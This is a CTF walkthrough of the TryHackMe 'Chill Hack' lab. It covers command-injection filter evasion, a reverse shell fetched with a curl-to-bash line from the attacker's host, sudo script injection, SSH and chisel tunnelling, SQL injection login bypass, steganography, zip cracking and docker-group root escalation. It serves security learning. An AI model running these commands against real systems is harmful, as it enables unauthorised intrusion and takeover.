Chill Hack walkthrough TryHackMe

Hello guys back again with another walkthrough this time am going to be solving Chill Hack from TryHackMe. Speaking the truth i really liked this room because somehow it showed some real word challenges like port forwarding and a privilege escalation that can also happen in the real world. You start off by finding a command injection vulnerability in a web server and exploit the vulnerability to get a shell on the box. Then you have to exploit a bash script and escalate your privileges to a user called apaar and then you can drop a SSH key and then take advantage of SSH to do port forwarding to a port that’s running on localhost. The website you did a port forward on is vulnerable to SQL Injection and you can use this to do an authentication bypass and then get access to authenticated content.Once you login, you find a hint that make you suspect stenography. Copy the image to your box do some stego analysis and get a backup zip file. The zip file is encrypted using a password. You generate a hash using zip2john and the crack with john the ripper and get the password for the the zip file. Extract the zip file and you find PHP Source code that has some credentials for another user. Escalate your privilege to that user and find he’s in a docker group do some GTFOBins magic and get a root shell on the box it a really fun box without much say let’s jump in

As always we are going to start off with a nmap scan of the box

Looking at the result we have three ports that are open. FTP,SSH and HTTP. Since FTP had anonymous login allowed i decided to enumerate it first.

Doing a directory listing for the FTP we see that we have one file present called note.txt

I downloaded the file to my local box

Taking a look at it we see that two users namely Anurodh and Apaar are talking about filtering of string that are being put in a command. Meaning when we do this box we must remember in the back of our minds that maybe some of our command maybe filtered by the web application and probably we might get false negatives

Also we gained another useful information like the usernames of likely users to be on the box. We could use this info and try to brute force SSH credentials using hydra. But i opted against that for now.

Next i decided to enumerate HTTP. First i opened the webpage using Mozilla and didn’t have much

Before doing any manual enumeration i decided to start some tools and leave then running in the background

First i ran gobuster a tool used to brute-force URIs including directories and files as well as DNS subdomains.

Next i ran nikto scan which is a web application vulnerability scanner

While the tools were running in the background i decided enumerate the website manually

I tried to see if robots.txt existed on the web server and i wasn’t lucky

Next i decided to take a look at the page source and see if the developer left any sensitive information but there wasn’t anything useful

Going back to my gobuster scan it had found several directories and one of them was interesting

/secret

I decided to take a look at the directory and found it had an index.php file that could execute commands

I decided to start off easy and just execute ls to get a directory listing

But when i executed the command i got an error message

I though that maybe these could be a troll page with no real function but to confirm my suspicious i tried another command

ifconfig

And the command executed just fine. Then i remembered there was filtering around some words in the command. The simplest way that i always try to bypass any filtering in command injection is by using backslashes

So long as am not escaping any special characters then the word will still be interpreted the same way by bash

So i tried executing ls again but this i did put a backlash between l and s

l\s -la

And looking at the command below we have successfully bypassed the filtering

Next i decided to take a look at the PHP file running the commands and see what other words were blacklisted by the script using the command below

c\at index.php

And looking at the source we see some more words that are filtered by the script include

nc, python, bash,php,perl,rm,cat,head,tail,python3,more,less,sh,ls

These words are mostly used to get reverse shells on any system. But we now have a way to bypass those restriction. Next let’s get a shell on the box.

I created a bash reverse shell on by box

Next i started a HTTP web server and then started a netcat listener

Then i downloaded the script using curl and piped it’s contents over to bash using the command below. The importance of using bash was to ensure that the file doesn’t get saved on the disk and this comes in handy when you can’t write to the location where the script is running since the downloaded contents are automatically passed to a bash instance

curl 10.8.2.58:8000/shell.sh | ba\sh

Looking at the command above i escaped bash since it was one of the blacklisted words

I executed the command using the web server command injection

And going back to my netcat listener i had a shell waiting

Sweet initial foothold done!!. Next i decided to upgrade my shell to get a full tty shell on the server

After obtaining a stable shell that had line wraps enabled i decided to upload linpeas to the box. linpeas is an awesome script that automatically identifies privilege escalation vectors.

Then ran the linpeas script and left it till it had completed doing the necessary checks. After analyzing the results two things stood out

  1. There was a port that was only exposed to localhost

2. We could run a script called helpline.sh as a different user without knowing the user’s passwords

From here there are two ways which we could advance doing the box. The author of the box failed to account for binaries that could create a reverse tunnel and if we use such a binary like chisel we could bypass an entire step of getting a user on the box. But first am going to show the intended method then the unintended method later

By executing the sudo -l on the box we saw that we can execute a script called helpline.sh as the user Apaar. I decided to take a look at the source code of the script and we see that it’s vulnerable to command injection

The user’s supplied input is directly passed to a bash instance and we could use this to our advantage and execute a bash shell and get a bash instance as the user Apaar.

Let’s try it below

Looking at the screen below you can see that we have successfully escalated our privileges from the Apache user (www-data)

Looking at Apaar’s home directory we have a user flag

We can now submit the flag and earn the points from TryHackme

Next we could drop a SSH key on the server and use SSH to do a reverse tunneling of the port we want to access back to on box

I created SSH key pair using ssh-keygen binary from Linux

I copied the public key to the authorized_keys file on the server apaar’s .ssh folder

Gave the SSH private key necessary permission and used the argument -L in SSH to perform a reverse port forwarding of the local port to my connect back to my local box port 9001

Next i tried to access the port from my local box using Mozilla

And voila looking at the screenshot below it works

The second way we could have accessed the customer portal was by using Chisel a binary that creates a reverse tunnel

First we need to have two copies of chisel one on the server acting as a client and one on my box acting as the server (i know it sounds confusing).

So i downloaded a copy o f chisel to the server and created a Chisel server on my end of the box

Next i did set up a client connection from the victim

And looking at the screenshot above we have a connection. Sweet let’s again try and and connect to port 9004 and see if the tunneling was successful

And we still have a connection as seen above sweet. Now you see we could bypass an entire step and still get a reverse tunnel back to our box

But enough of tunneling for now. If you could take a decent look at the files in the box you could have could have noticed that the directory hosting the second web server was in

/var/www/files/

Looking at the account.php we can see that the script performs raw SQL queries without doing any proper filtering or sanitization on user input

And this leads to SQL Injection vulnerability on the website.

On looking at the other file index.php i got the root’s password to MySQL server

I tried those credentials for root and it didn’t work

Next i intercepted a login request of the website that i had tunneled and save it in a file i wanted to use it to run sqlmap

While sqlmap was running in the background, i decided to create a python script that uses SQL injection login bypass payloads and automatically submits them to the site and utilizes the responses obtained from the website to determine whether we had bypassed the login screen

The file that contained authentication bypass payloads can be found using the link below

Payloads

Once the script ran we had some success

I tried one of the above payloads and automatically bypassed the login page

Looking at the hackers.php file we get a hint and a picture the first thought that came in mind was stenography. I downloaded the image to my local box using wget

Next i tried simple stenographic techniques. And steghide was able to identify an embedded file

I used the command

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

to extract the embedded files and as you can see below we have a file called backup.zip

I tried to extract the backup archive but as you can see below it required credentials

By using a binary called zip2john we can convert the encrypted file to a hash format that john the ripper can understand and crack to give us the pain text password

Now that we have the hash let’s get cracking

Looking at the screenshot below almost immediately we have the password

Sorry i can’t show the password since i want my writeup to be accepted by TryHackMe

But let’s extract the zip file

Looking at the screenshot above we have successfully extracted a PHP script.

Let’s take a look at it using VIM

Looking at the source code we have a base64 encoded credentials and a username Anurodh

Let’s decrypt the password and try escalating our privileges to that user using those credentials

looking at the above screenshot we have successfully escalated our privileges to Anurodha

Running an id command we see that we are in the docker group

Using the following one liner below from GTFOBins we get a root shell

Now lets get root.txt submit it and get the points on TryHackMe

And the box is done.

Looking at the sqlmap results we have some hashes but it doesn’t look like we’ll need it

It was really fun but am sure by now you know most of the steps we could have bypassed like port forwarding since we knew the root directory of the second web server. But i hope you liked the walkthough if so clap for me down below and make sure you follow me so that you won’t miss any upcoming articles

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)